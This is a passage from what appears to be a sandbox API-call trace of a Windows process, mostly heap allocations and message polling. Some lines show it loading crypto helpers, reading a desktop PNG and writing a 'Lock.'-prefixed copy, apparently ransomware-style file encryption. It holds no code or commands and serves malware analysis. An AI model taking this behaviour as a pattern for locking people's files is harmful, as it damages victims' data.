lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0214.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0214.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0214.119] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0214.119] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.119] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0214.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0214.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0214.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0214.120] CryptDestroyHash (hHash=0xa87310) returned 1 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0214.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0214.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0214.146] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.146] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.146] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0214.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0214.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0214.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0214.147] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/yW8EXq3.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yw8exq3.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0214.147] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.148] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0214.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0214.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0214.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0214.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0214.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0214.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0214.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0214.149] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0214.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0214.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0214.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0214.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0214.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0214.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0214.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.yW8EXq3.png" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.yw8exq3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0214.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0214.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0214.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0214.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0214.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0214.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0214.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0214.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0214.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0214.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0214.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0214.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0214.156] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0214.156] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xb494, lpOverlapped=0x0) returned 1 [0214.159] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0214.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0214.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0214.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0214.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0214.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2f24018 [0214.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0214.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0214.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0214.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0214.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0214.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0214.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2f2f4b8 [0214.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0214.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0214.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0214.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0214.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0214.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0214.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2f24018 [0214.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0214.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0214.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0214.165] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0214.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 